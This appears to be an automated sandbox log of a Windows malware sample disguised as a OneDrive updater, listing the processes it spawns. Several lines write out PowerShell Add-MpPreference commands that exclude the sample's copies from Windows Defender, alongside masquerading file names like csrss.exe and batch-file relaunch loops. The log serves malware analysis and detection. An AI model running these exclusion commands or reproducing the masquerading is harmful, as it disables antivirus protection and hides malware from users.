Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'	Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp" "c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Queries volume information: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
